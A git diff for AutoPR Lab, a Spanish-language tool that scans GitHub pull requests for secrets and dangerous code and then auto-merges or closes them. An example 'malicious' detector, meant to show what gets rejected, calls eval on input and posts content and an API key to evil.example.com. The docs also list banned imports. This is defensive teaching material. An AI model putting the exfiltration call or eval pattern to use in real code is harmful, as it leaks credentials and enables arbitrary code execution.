file_path=file_path, + ) + ) + return 
results + + # Analizar contenido de cualquier archivo + for pattern, description in self.SENSITIVE_CONTENT_PATTERNS: + match = re.search(pattern, content, re.MULTILINE | re.IGNORECASE) + if match: + line_num = content[: match.start()].count("\n") + 1 + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Contenido sensible en `{filename}`: {description}", + details=[ + f"Patrón encontrado en línea {line_num}", + "🔐 El contenido de este archivo no debe estar en el repositorio.", + ], + file_path=file_path, + line_number=line_num, + ) + ) + + return results diff --git a/docs/example-outputs.md b/docs/example-outputs.md new file mode 100644 index 0000000..fc4a9aa --- /dev/null +++ b/docs/example-outputs.md @@ -0,0 +1,190 @@ +# 📊 Ejemplos de Outputs de AutoPR Lab + +Esta página muestra los outputs reales del sistema en distintos escenarios. + +--- + +## Escenario 1: PR Limpio → MERGE ✅ + +**PR:** Agrega `SQLInjectionDetector` con tests + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #42 +INFO autopr.scanner | Archivos a analizar: 2 +INFO autopr.scanner | Analizando: detectors/sql_injection_detector.py +INFO autopr.scanner | [OK] DetectorFormatValidator: Estructura del detector válida +INFO autopr.scanner | Analizando: tests/test_sql_injection_detector.py +INFO autopr.scanner | ✅ Análisis completado en 87ms +INFO autopr.scanner | Estado: OK | Decisión: MERGE +INFO autopr.scanner | Errores: 0 | Advertencias: 0 | OK: 1 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ✅ DECISIÓN: MERGE AUTOMÁTICO APROBADO + +El PR cumple todos los requisitos de seguridad y calidad.
+ +| Métrica | Valor | +|---------|-------| +| Archivos analizados | `2` | +| Detectores ejecutados | `4` | +| Errores | `0` | +| Advertencias | `0` | +| Tiempo de análisis | `87ms` | + +### 🔍 Detectores ejecutados +- ✅ `APIKeysDetector` +- ✅ `PasswordsDetector` +- ✅ `SensitiveFilesDetector` +- ✅ `DetectorFormatValidator` + +> 🔀 **Este PR ha sido mergeado automáticamente** por AutoPR Lab. + +--- + +## Escenario 2: PR con Advertencias → WARN_MERGE ⚠️ + +**PR:** Agrega detector con archivo `.env.example` (template) + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #43 +INFO autopr.scanner | Archivos a analizar: 2 +INFO autopr.scanner | Analizando: detectors/new_detector.py +INFO autopr.scanner | [OK] DetectorFormatValidator: Estructura del detector válida +INFO autopr.scanner | Analizando: .env.example +INFO autopr.scanner | [WARNING] SensitiveFilesDetector: Archivo de template detectado +INFO autopr.scanner | ✅ Análisis completado en 102ms +INFO autopr.scanner | Estado: WARNING | Decisión: WARN_MERGE +INFO autopr.scanner | Errores: 0 | Advertencias: 1 | OK: 1 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ⚠️ DECISIÓN: MERGE CON ADVERTENCIAS + +**⚠️ Advertencias:** +- **SensitiveFilesDetector**: Archivo de template detectado: `.env.example` en `.env.example` + - Este archivo de ejemplo/template es aceptable si solo contiene placeholders. + - ✅ Asegúrate de que los valores sean ficticios (ej: YOUR_API_KEY_HERE). + +> 🔀 **Este PR ha sido mergeado automáticamente** a pesar de las advertencias. 
+ +--- + +## Escenario 3: PR con Errores → REJECT ❌ + +**PR:** Intenta agregar un detector con API key hardcodeada + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #44 +INFO autopr.scanner | Archivos a analizar: 1 +INFO autopr.scanner | Analizando: detectors/malicious_detector.py +INFO autopr.scanner | [ERROR] APIKeysDetector: Posible OpenAI API Key detectado +INFO autopr.scanner | [ERROR] PasswordsDetector: Password hardcodeado en 'DATABASE_PASSWORD' +INFO autopr.scanner | [ERROR] DetectorFormatValidator: Import prohibido: subprocess +INFO autopr.scanner | [ERROR] DetectorFormatValidator: Función peligrosa: eval() +INFO autopr.scanner | [ERROR] SensitiveFilesDetector: Clave privada RSA detectada +WARNING autopr.scanner | ⚠️ Violaciones de paths: [] +INFO autopr.scanner | ✅ Análisis completado en 134ms +INFO autopr.scanner | Estado: ERROR | Decisión: REJECT +INFO autopr.scanner | Errores: 5 | Advertencias: 0 | OK: 0 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ❌ DECISIÓN: PR RECHAZADO Y CERRADO + +**❌ Errores críticos:** +- **APIKeysDetector**: Posible OpenAI API Key detectado en `detectors/malicious_detector.py`, línea 14 + - Patrón detectado: `sk-ab****************************ijk` + - ⚠️ Nunca hardcodees credenciales. Usa variables de entorno. +- **PasswordsDetector**: Password hardcodeado en variable 'DATABASE_PASSWORD' + - Variable: `DATABASE_PASSWORD` +- **DetectorFormatValidator**: Import prohibido en detector: `subprocess` + - Los detectores no pueden importar módulos de red o ejecución de código. +- **DetectorFormatValidator**: Función peligrosa en detector: `eval()` + - `eval()` puede ejecutar código arbitrario y está prohibida en detectores. +- **SensitiveFilesDetector**: Contenido sensible: Clave privada PEM + +> 🚫 **Este PR ha sido cerrado automáticamente** por AutoPR Lab. 
+ +--- + +## Escenario 4: Modificación de /core/ → REJECT ❌ + +**PR:** Intenta modificar `core/scanner.py` (ruta prohibida) + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #45 +WARNING autopr.scanner | ⚠️ Violaciones de paths: +WARNING autopr.scanner | 🚫 PROHIBIDO: core/scanner.py (ruta crítica del sistema) +INFO autopr.scanner | ✅ Análisis completado en 12ms +INFO autopr.scanner | Estado: ERROR | Decisión: REJECT +``` + +**Comentario en el PR:** + +--- + +**🛡️ Violaciones de reglas de seguridad:** +- 🚫 PROHIBIDO: `core/scanner.py` (ruta crítica del sistema) + +### 🔧 ¿Cómo corregir este PR? +1. Los archivos modificados deben estar solo en: `/detectors/`, `/tests/`, `/docs/` +2. Para cambios en `/core/` o workflows, abre un issue para revisión manual. + +--- + +## Scan Result JSON (ejemplo) + +```json +{ + "global_status": "ERROR", + "decision": "REJECT", + "pr_number": 44, + "files_analyzed": 1, + "total_findings": 5, + "errors": 5, + "warnings": 0, + "ok_count": 0, + "scan_duration_ms": 134.7, + "detectors_run": [ + "APIKeysDetector", + "PasswordsDetector", + "SensitiveFilesDetector", + "DetectorFormatValidator" + ], + "timestamp": "2025-03-15T10:30:00Z", + "path_validation": { + "paths_ok": true, + "size_ok": true, + "violations": [] + }, + "findings": [ + { + "status": "ERROR", + "detector_name": "APIKeysDetector", + "message": "Posible OpenAI API Key detectado", + "details": [ + "Patrón detectado: `sk-ab****************************ijk`", + "⚠️ Nunca hardcodees credenciales. Usa variables de entorno." + ], + "file_path": "detectors/malicious_detector.py", + "line_number": 14 + } + ] +} +``` diff --git a/docs/how-to-add-detector.md b/docs/how-to-add-detector.md new file mode 100644 index 0000000..5604bc9 --- /dev/null +++ b/docs/how-to-add-detector.md @@ -0,0 +1,187 @@ +# 🔌 Cómo Agregar un Detector a AutoPR Lab + +Esta guía explica paso a paso cómo contribuir con un detector nuevo al sistema. 
+ +## 📋 Requisitos previos + +- Python 3.10+ +- Conocimiento básico de `re` (regex) y `ast` (AST de Python) +- Haber leído el código de un detector existente (ej: `api_keys_detector.py`) + +--- + +## 1. Crear el archivo del detector + +Crea un nuevo archivo en `/detectors/`: + +``` +detectors/ +└── mi_nuevo_detector.py ← Tu archivo aquí +``` + +**Regla de naming:** `nombre_detector.py` en snake_case. + +--- + +## 2. Estructura mínima requerida + +Todo detector **debe** heredar de `BaseDetector` e implementar estos métodos: + +```python +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + + +class MiNuevoDetector(BaseDetector): + + @property + def name(self) -> str: + return "MiNuevoDetector" # Nombre único, sin espacios + + @property + def description(self) -> str: + return "Detecta X en el código" # Una línea descriptiva + + @property + def severity(self) -> str: + return "medium" # "critical" | "high" | "medium" | "low" + + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + results = [] + + # Tu lógica de análisis aquí + if "algo_sospechoso" in content: + results.append(DetectorResult( + status=DetectorStatus.ERROR, # OK | WARNING | ERROR + detector_name=self.name, + message="Se encontró algo sospechoso", + details=["Detalle 1", "Sugerencia de corrección"], + file_path=file_path, + line_number=1, # Opcional + )) + + return results +``` + +--- + +## 3. Los tres estados posibles + +| Estado | Cuándo usarlo | Efecto en el PR | +|--------|---------------|-----------------| +| `DetectorStatus.OK` | Todo correcto | Contribuye al merge automático | +| `DetectorStatus.WARNING` | Posible problema no crítico | Merge con comentario de advertencia | +| `DetectorStatus.ERROR` | Problema crítico confirmado | PR rechazado y cerrado | + +--- + +## 4. Reglas de seguridad para detectores + +⚠️ **Tu detector será validado automáticamente** por `DetectorFormatValidator`. 
+ +### ✅ Permitido: +```python +import re # ✅ Regex +import os.path # ✅ Operaciones de path +from typing import List # ✅ Type hints +import ast # ✅ Parsing de código +import hashlib # ✅ Hashing +``` + +### ❌ Prohibido (el PR será rechazado): +```python +import subprocess # ❌ Ejecución de comandos +import socket # ❌ Conexiones de red +import requests # ❌ HTTP requests +eval(anything) # ❌ Evaluación de código +exec(anything) # ❌ Ejecución de código +``` + +--- + +## 5. Omitir archivos innecesarios + +Usa `should_skip()` para evitar analizar archivos no relevantes: + +```python +def should_skip(self, file_path: str) -> bool: + # Llamar al padre primero (omite binarios por defecto) + if super().should_skip(file_path): + return True + + # Tu lógica adicional + return not file_path.endswith(".py") # Ej: solo analizar Python +``` + +--- + +## 6. Escribir tests + +Cada detector debe tener tests en `/tests/`: + +```python +# tests/test_mi_nuevo_detector.py +import unittest +from detectors.mi_nuevo_detector import MiNuevoDetector +from detectors.base_detector import DetectorStatus + +class TestMiNuevoDetector(unittest.TestCase): + + def setUp(self): + self.detector = MiNuevoDetector() + + def test_detects_problem(self): + content = "código con algo_sospechoso aquí" + results = self.detector.analyze("archivo.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_clean_code_passes(self): + content = "código limpio sin problemas" + results = self.detector.analyze("archivo.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_false_positive_ignored(self): # Requiere que tu detector ignore comentarios (el ejemplo mínimo de la sección 2 no lo hace) + content = "# esto es un comentario con algo_sospechoso" + results = self.detector.analyze("archivo.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + +if __name__ == "__main__": + unittest.main() +``` + +--- + +## 7. ¿Qué pasa después? 
+ +1. Abres un PR con tu nuevo archivo en `/detectors/` y su test en `/tests/` +2. AutoPR Lab analiza automáticamente tu PR +3. `DetectorFormatValidator` valida la estructura de tu detector +4. Si pasa → **merge automático** ✅ +5. Si falla → comentario con los problemas específicos y **cierre automático del PR** ❌ + +--- + +## 8. Ejemplos de detectores existentes + +| Detector | Detecta | Complejidad | +|----------|---------|-------------| +| `api_keys_detector.py` | API keys y tokens | Media | +| `passwords_detector.py` | Contraseñas hardcodeadas | Media | +| `sensitive_files_detector.py` | Archivos sensibles | Media | +| `detector_validator.py` | Formato de detectores | Alta | + +--- + +## 9. Ideas para nuevos detectores + +- `sql_injection_detector.py` — Queries SQL con f-strings/concatenación +- `debug_code_detector.py` — `print()`, `console.log()`, `debugger` en producción +- `todo_comments_detector.py` — TODO/FIXME/HACK en código crítico +- `license_header_detector.py` — Archivos sin header de licencia +- `dependency_version_detector.py` — Dependencias sin versión pinneada + +--- + +¿Tienes dudas? [Abre un issue](../../issues/new) en el repositorio. diff --git a/examples/invalid-pr/malicious_detector.py b/examples/invalid-pr/malicious_detector.py new file mode 100644 index 0000000..e1149f9 --- /dev/null +++ b/examples/invalid-pr/malicious_detector.py @@ -0,0 +1,54 @@ +""" +Ejemplo de PR INVÁLIDO — Detector malicioso/mal formado +========================================================= +Este archivo representa lo que AutoPR Lab RECHAZARÁ automáticamente. + +❌ Tiene imports de red prohibidos (requests) +❌ Usa subprocess para ejecución de comandos +❌ Usa eval() (ejecución de código arbitrario) +❌ Tiene una API key hardcodeada +❌ Tiene una password hardcodeada + +AutoPR Lab detectará estos problemas y: +1. Agregará un comentario detallando cada error +2. 
Cerrará el PR automáticamente +""" + +# ❌ IMPORTS PROHIBIDOS +import subprocess + +import requests # No permitido en detectores + +# ❌ API KEY HARDCODEADA (APIKeysDetector la detectará) +OPENAI_API_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk" +GITHUB_TOKEN = "ghp_1234567890abcdefghijklmnopqrstuvwxyz12" + +# ❌ PASSWORD HARDCODEADA (PasswordsDetector la detectará) +DATABASE_PASSWORD = "mysupersecretpassword123" +admin_password = "admin123" + + +# ❌ No hereda de BaseDetector (DetectorFormatValidator lo detectará) +class MaliciousDetector: + def analyze(self, file_path: str, content: str): + # ❌ Ejecución de código arbitrario + eval(content) + + # ❌ Ejecución de comandos del sistema + _ = subprocess.run(["cat", file_path], capture_output=True) + + # ❌ Conexión de red para exfiltrar datos + requests.post( + "https://evil.example.com/steal", + json={"content": content, "api_key": OPENAI_API_KEY}, + ) + + return [] + + +# ❌ RSA Private Key en el código +PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA1234567890abcdefghijklmnopqrstuvwxyz... +-----END RSA PRIVATE KEY----- +""" diff --git a/examples/valid-pr/sql_injection_detector.py b/examples/valid-pr/sql_injection_detector.py new file mode 100644 index 0000000..1663e07 --- /dev/null +++ b/examples/valid-pr/sql_injection_detector.py @@ -0,0 +1,114 @@ +""" +Ejemplo de PR VÁLIDO — Nuevo detector de SQL Injection +======================================================= +Este archivo representa un PR que AutoPR Lab ACEPTARÁ y mergeará automáticamente. + +✅ Está en /detectors/ (ruta permitida) +✅ Hereda de BaseDetector +✅ No tiene imports peligrosos +✅ Implementa todos los métodos requeridos +✅ No contiene secretos ni credenciales +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class SQLInjectionDetector(BaseDetector): + """ + Detecta posibles vulnerabilidades de SQL Injection en el código. 
+ Busca queries construidas por concatenación o f-strings en lugar de + parámetros preparados (prepared statements). + """ + + # Patrones de SQL injection potencial + PATTERNS = [ + # f-strings con SQL + ( + r'f["\'].*?(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE).*?\{', + "SQL con f-string", + ), + # Concatenación de strings con SQL + ( + r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?["\']\s*\+\s*\w+', + "SQL con concatenación", + ), + # format() en queries SQL + ( + r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?["\']\.format\(', + "SQL con .format()", + ), + # % formatting en queries SQL + (r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?%\s*[\(\w]', "SQL con % formatting"), + # execute() con concatenación directa (peligroso) + (r'\.execute\s*\(\s*["\'].*?\+', "execute() con concatenación"), + (r'\.execute\s*\(\s*f["\']', "execute() con f-string"), + ] + + # Patrones seguros (prepared statements / parameterized queries) + SAFE_PATTERNS = [ + r"\.execute\s*\(\s*['\"].*?\?", # SQLite/MySQL con ? + r"\.execute\s*\(\s*['\"].*?%s", # psycopg2 con %s + r"\.execute\s*\(\s*['\"].*?:\w+", # SQLAlchemy con :param + r"text\(['\"]", # SQLAlchemy text() + r"sqlalchemy", # SQLAlchemy en general + ] + + SQL_FILE_EXTENSIONS = {".py", ".js", ".ts", ".php", ".rb", ".java", ".cs", ".go"} + + @property + def name(self) -> str: + return "SQLInjectionDetector" + + @property + def description(self) -> str: + return "Detecta posibles vulnerabilidades de SQL Injection por concatenación de strings" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + if super().should_skip(file_path): + return True + _, ext = file_path.rsplit(".", 1) if "." 
in file_path else (file_path, "") + return f".{ext}" not in self.SQL_FILE_EXTENSIONS + + def _has_safe_pattern(self, line: str) -> bool: + return any(re.search(p, line, re.IGNORECASE) for p in self.SAFE_PATTERNS) + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._has_safe_pattern(line): + continue + if line.strip().startswith("#") or line.strip().startswith("//"): + continue + + for pattern, description in self.PATTERNS: + if re.search(pattern, line, re.IGNORECASE): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Posible SQL Injection: {description}", + details=[ + f"Línea problemática: `{line.strip()[:100]}`", + "🔒 Usa prepared statements o parámetros vinculados:", + " ✅ cursor.execute('SELECT * FROM users WHERE id = ?', (user_id,))", + " ✅ cursor.execute('SELECT * FROM users WHERE id = %s', (user_id,))", + " ❌ cursor.execute(f'SELECT * FROM users WHERE id = {user_id}')", + ], + file_path=file_path, + line_number=line_num, + ) + ) + break + + return results diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 0000000..e424731 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,135 @@ +[build-system] +requires = ["setuptools>=61.0", "wheel"] +build-backend = "setuptools.build_meta" + +[project] +name = "autopr-lab" +version = "1.0.0" +description = "Sistema de revisión y merge automático de Pull Requests con análisis de seguridad integrado" +readme = "README.md" +requires-python = ">=3.11" +license = {text = "MIT"} +authors = [ + {name = "AutoPR Lab Team", email = "team@autopr.lab"} +] +keywords = ["github", "pull-request", "security", "automation", "ci-cd"] +classifiers = [ + "Development Status :: 5 - Production/Stable", + "Intended Audience :: Developers", + "License :: OSI Approved :: MIT License", + 
"Programming Language :: Python :: 3", + "Programming Language :: Python :: 3.10", + "Programming Language :: Python :: 3.11", + "Programming Language :: Python :: 3.12", + "Programming Language :: Python :: 3.13", + "Topic :: Software Development :: Libraries :: Python Modules", + "Topic :: Security", + "Topic :: System :: Software Distribution" +] + +[project.optional-dependencies] +dev = [ + "pytest>=8.0.0", + "pytest-cov>=5.0.0", + "ruff>=0.8.0", + "mypy>=1.9.0" +] +security = [ + "safety>=3.0.0", + "bandit>=1.7.0" +] + +[project.urls] +Homepage = "https://github.com/Devsebastian44/pull-shark-test" +Repository = "https://github.com/Devsebastian44/pull-shark-test" +Documentation = "https://github.com/Devsebastian44/pull-shark-test/docs" +"Bug Tracker" = "https://github.com/Devsebastian44/pull-shark-test/issues" + +[tool.setuptools.packages.find] +where = ["."] +include = ["core*", "detectors*", "utils*", "scripts*"] + +[tool.ruff] +line-length = 88 +target-version = "py313" +include = ["*.py"] +exclude = [ + ".git", + "__pycache__", + "build", + "dist", + ".venv", + "venv" +] + +[tool.ruff.lint] +select = [ + "E", # pycodestyle errors + "W", # pycodestyle warnings + "F", # pyflakes + "I", # isort + "B", # flake8-bugbear + "C4", # flake8-comprehensions + "UP", # pyupgrade +] +ignore = [ + "E501", # line too long, handled by black + "B008", # do not perform function calls in argument defaults +] + +[tool.ruff.format] +quote-style = "double" +indent-style = "space" + +[tool.mypy] +python_version = "3.13" +strict = true +warn_return_any = true +warn_unused_configs = true +disallow_untyped_defs = true +disallow_incomplete_defs = true +check_untyped_defs = true +disallow_untyped_decorators = true +no_implicit_optional = true +warn_redundant_casts = true +warn_unused_ignores = true +warn_no_return = true +warn_unreachable = true +strict_equality = true + +[tool.pytest.ini_options] +minversion = "8.0" +addopts = "-ra -q --strict-markers --strict-config" +testpaths = 
["tests"] +markers = [ + "slow: marks tests as slow (deselect with '-m \"not slow\"')", + "integration: marks tests as integration tests", + "unit: marks tests as unit tests" +] + +[tool.coverage.run] +source = ["."] +omit = [ + "tests/*", + ".venv/*", + "venv/*", + "*/site-packages/*" +] + +[tool.coverage.report] +exclude_lines = [ + "pragma: no cover", + "def __repr__", + "if self.debug:", + "if settings.DEBUG", + "raise AssertionError", + "raise NotImplementedError", + "if 0:", + "if __name__ == .__main__.:" +] + +[[tool.mypy.overrides]] +module = "tests.*" +disallow_untyped_defs = false +disallow_incomplete_defs = false +check_untyped_defs = false diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..c0d4486 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +# AutoPR Lab - Dependencies +# Solo usa módulos de la biblioteca estándar de Python 3.10+ +# No se requieren dependencias externas para el core del sistema. + +# Testing (opcional, para desarrollo local) +pytest>=8.0.0 +pytest-cov>=5.0.0 + +# Linting y formato (opcional, para CI adicional) +ruff>=0.8.0 +mypy>=1.9.0 + +# Herramientas de seguridad (opcional, para escaneo) +safety>=3.0.0 +bandit>=1.7.0 diff --git a/scripts/decision_engine.py b/scripts/decision_engine.py new file mode 100644 index 0000000..743b25a --- /dev/null +++ b/scripts/decision_engine.py @@ -0,0 +1,268 @@ +#!/usr/bin/env python3 +""" +AutoPR Lab - Decision Engine +============================== +Script principal invocado por GitHub Actions. +Orquesta el análisis completo y ejecuta la decisión automática. 
+ +Uso: + python scripts/decision_engine.py + +Variables de entorno requeridas: + GITHUB_TOKEN - Token del workflow de GitHub Actions + GITHUB_REPOSITORY - Repositorio en formato "owner/repo" + PR_NUMBER - Número del Pull Request + PR_BASE_BRANCH - Branch destino del PR (opcional, default: main) + +Variables opcionales: + DRY_RUN - Si es "true", no ejecuta acciones (solo analiza) + LOG_LEVEL - Nivel de logging (DEBUG, INFO, WARNING, ERROR) +""" + +import json +import os +import sys + +# Agregar el directorio raíz al path para imports +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +from core.scanner import Scanner, ScanResult +from utils.comment_templates import ( + build_merge_comment, + build_reject_comment, + build_warn_merge_comment, +) +from utils.github_api import GitHubAPI, GitHubAPIError +from utils.logger import get_logger + +logger = get_logger("decision_engine") + + +def get_required_env(name: str) -> str: + """Obtiene una variable de entorno requerida o termina con error.""" + value = os.environ.get(name, "").strip() + if not value: + logger.error(f"Variable de entorno requerida no encontrada: {name}") + sys.exit(1) + return value + + +def collect_pr_files(github: GitHubAPI) -> tuple[dict[str, str], int]: + """ + Descarga los archivos modificados del PR. + Intenta obtener el contenido completo de cada archivo. 
+ + Returns: + ({file_path: content}, total_lines_changed) + """ + logger.info("📥 Descargando archivos del PR...") + pr_info = github.get_pr_info() + head_sha = pr_info.get("head", {}).get("sha", "") + changed_files_info = github.get_changed_files() + + changed_files = {} + total_lines = 0 + + for file_info in changed_files_info: + file_path = file_info.get("filename", "") + additions = file_info.get("additions", 0) + deletions = file_info.get("deletions", 0) + total_lines += additions + deletions + + raw_url = file_info.get("raw_url", "") + status = file_info.get("status", "") + + # Si el archivo fue eliminado, usar string vacío para el análisis + if status == "removed": + changed_files[file_path] = "" + logger.info(f" 📄 {file_path} (eliminado)") + continue + + # Descargar contenido completo + content = "" + if raw_url: + content = github.get_file_content(raw_url) + + # Fallback: si raw_url falló o no existe, intentar por API de contenidos + if not content and head_sha: + logger.debug(f" ⚠️ Usando fallback para {file_path}") + content = github.get_file_content_by_path(file_path, head_sha) + + # Último recurso: usar el patch (no recomendado por ser incompleto) + if not content: + patch = file_info.get("patch", "") + if patch: + logger.warning( + f" ⚠️ Escaneando solo el fragmento (patch) de {file_path}" + ) + content = patch + + changed_files[file_path] = content + logger.info(f" 📄 {file_path} (+{additions}/-{deletions})") + + logger.info( + f" Total: {len(changed_files)} archivos, {total_lines} líneas cambiadas" + ) + return changed_files, total_lines + + +def execute_decision( + github: GitHubAPI, + result: ScanResult, + dry_run: bool = False, +) -> int: + """ + Ejecuta la decisión basada en el resultado del análisis. 
+ + Returns: + Exit code: 0 = éxito, 1 = PR rechazado, 2 = error + """ + decision = result.decision + pr_number = result.pr_number + + logger.info("") + logger.info(f"{'=' * 60}") + logger.info(f" DECISIÓN FINAL: {decision}") + logger.info(f"{'=' * 60}") + logger.info(f" PR #{pr_number}") + logger.info(f" Estado: {result.global_status}") + logger.info(f" Errores: {result.errors} | Advertencias: {result.warnings}") + logger.info(f"{'=' * 60}") + logger.info("") + + if dry_run: + logger.info("🔍 DRY RUN activado — No se ejecutarán acciones reales") + logger.info(f" Decisión que se tomaría: {decision}") + print(json.dumps(result.to_dict(), indent=2, ensure_ascii=False)) + return 0 + + try: + if decision == "MERGE": + # ── PR Limpio: Aprobar + Merge ────────────────────────────── + logger.info("✅ Ejecutando: APPROVE + MERGE") + + github.approve_pr( + "AutoPR Lab: ✅ Análisis de seguridad completado sin problemas." + ) + github.merge_pr( + commit_title=f"[AutoPR] Merge PR #{pr_number} (auto-approved)", + commit_message=( + f"AutoPR Lab: Merge automático del PR #{pr_number}\n\n" + f"Detectores ejecutados: {len(result.detectors_run)}\n" + f"Archivos analizados: {result.files_analyzed}\n" + f"Resultado: {result.global_status}" + ), + merge_method="squash", + ) + github.add_comment(build_merge_comment(result)) + logger.info("✅ PR mergeado exitosamente") + return 0 + + elif decision == "WARN_MERGE": + # ── PR con Advertencias: Aprobar + Merge + Comentario ─────── + logger.info("⚠️ Ejecutando: APPROVE + MERGE (con advertencias)") + + github.approve_pr( + f"AutoPR Lab: ⚠️ Aprobado con {result.warnings} advertencia(s). " + "Ver comentario para detalles." 
+ ) + github.merge_pr( + commit_title=f"[AutoPR] Merge PR #{pr_number} (warnings)", + merge_method="squash", + ) + github.add_comment(build_warn_merge_comment(result)) + logger.info("⚠️ PR mergeado con advertencias") + return 0 + + elif decision == "REJECT": + # ── PR con Errores: Comentar + Cerrar ─────────────────────── + logger.info("❌ Ejecutando: COMMENT + CLOSE") + + github.add_comment(build_reject_comment(result)) + github.close_pr() + logger.info("❌ PR rechazado y cerrado") + + # Salir con código de error para que el workflow falle + return 1 + + else: + logger.error(f"Decisión desconocida: {decision}") + return 2 + + except GitHubAPIError as e: + logger.error(f"Error de GitHub API: {e}") + logger.error(f" Status code: {e.status_code}") + logger.error(f" Respuesta: {e.response[:200]}") + return 2 + + +def main() -> int: + """Función principal del decision engine.""" + logger.info("") + logger.info("🚀 AutoPR Lab — Decision Engine v1.0") + logger.info("=" * 50) + + # ── Configuración ────────────────────────────────────────────────── + token = get_required_env("GITHUB_TOKEN") + repo = get_required_env("GITHUB_REPOSITORY") + pr_number_str = get_required_env("PR_NUMBER") + dry_run = os.environ.get("DRY_RUN", "false").lower() == "true" + + try: + pr_number = int(pr_number_str) + except ValueError: + logger.error(f"PR_NUMBER inválido: '{pr_number_str}'") + sys.exit(1) + + logger.info(f" Repositorio: {repo}") + logger.info(f" PR: #{pr_number}") + logger.info(f" Dry Run: {dry_run}") + logger.info("") + + # ── GitHub API ───────────────────────────────────────────────────── + github = GitHubAPI(token=token, repo=repo, pr_number=pr_number) + + # ── Descargar archivos del PR ─────────────────────────────────────── + try: + changed_files, total_lines = collect_pr_files(github) + except GitHubAPIError as e: + logger.error(f"No se pudieron obtener los archivos del PR: {e}") + sys.exit(2) + + if not changed_files: + logger.warning("El PR no tiene archivos modificados 
detectables") + sys.exit(0) + + # ── Análisis con Scanner ─────────────────────────────────────────── + scanner = Scanner() + result = scanner.scan_pr( + pr_number=pr_number, + changed_files=changed_files, + lines_changed=total_lines, + ) + + # ── Guardar resultado como artefacto ─────────────────────────────── + output_path = os.environ.get("SCAN_OUTPUT", "scan_result.json") + with open(output_path, "w") as f: + f.write(result.to_json()) + logger.info(f"📄 Resultado guardado en: {output_path}") + + # Exportar para GitHub Actions outputs + github_output = os.environ.get("GITHUB_OUTPUT", "") + if github_output: + with open(github_output, "a") as f: + f.write(f"decision={result.decision}\n") + f.write(f"status={result.global_status}\n") + f.write(f"errors={result.errors}\n") + f.write(f"warnings={result.warnings}\n") + + # ── Ejecutar decisión ────────────────────────────────────────────── + exit_code = execute_decision(github, result, dry_run=dry_run) + + logger.info("") + logger.info(f"AutoPR Lab finalizado con código: {exit_code}") + return exit_code + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/scripts/validate_detectors.py b/scripts/validate_detectors.py new file mode 100644 index 0000000..e1d27c5 --- /dev/null +++ b/scripts/validate_detectors.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python3 +""" +AutoPR Lab - Detectors Validator Script +======================================== +Valida todos los detectores del proyecto usando el DetectorFormatValidator. 
+""" + +import os +import sys +from typing import Any, cast + +# Agregar el directorio raíz al path +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +from detectors import discover_detectors +from detectors.detector_validator import DetectorFormatValidator + + +def validate_all() -> None: + print("Validando estructura de detectores registrados...") + + validator = DetectorFormatValidator() + detector_classes = discover_detectors() + + detectors_dir = os.path.join( + os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "detectors" + ) + + any_error = False + results = [] + + for cls in detector_classes: + # Obtener el path del archivo de la clase + module = sys.modules.get(cls.__module__) + if not module or not hasattr(module, "__file__") or not module.__file__: + continue + + file_path = module.__file__ + rel_path = os.path.relpath(file_path, os.path.dirname(detectors_dir)) + + with open(file_path, encoding="utf-8") as f: + content = f.read() + + findings = validator.analyze(rel_path, content) + + # Filtrar solo errores + errors = [f for f in findings if f.status == "ERROR"] + is_valid = len(errors) == 0 + + if not is_valid: + any_error = True + + results.append( + { + "name": cls.__name__, + "path": rel_path, + "is_valid": is_valid, + "errors": [f.message for f in errors], + } + ) + + print(f"Validacion completada: {len(results)} detectores verificados") + for r in results: + data = cast(dict[str, Any], r) + status = "OK" if data["is_valid"] else "FAIL" + print(f" [{status}] {data['name']} ({data['path']})") + for err in cast(list[str], data["errors"]): + print(f" └─ ERROR: {err}") + + if any_error: + sys.exit(1) + else: + sys.exit(0) + + +if __name__ == "__main__": + validate_all() diff --git a/shark.md b/shark.md deleted file mode 100644 index ebfc253..0000000 --- a/shark.md +++ /dev/null @@ -1 +0,0 @@ -Probando logro Pull Shark diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 
class TestAPIKeysDetector(unittest.TestCase):
    """Unit tests for ``APIKeysDetector.analyze``."""

    def setUp(self):
        # A new detector instance is created for every test.
        self.detector = APIKeysDetector()

    def test_detects_github_token(self):
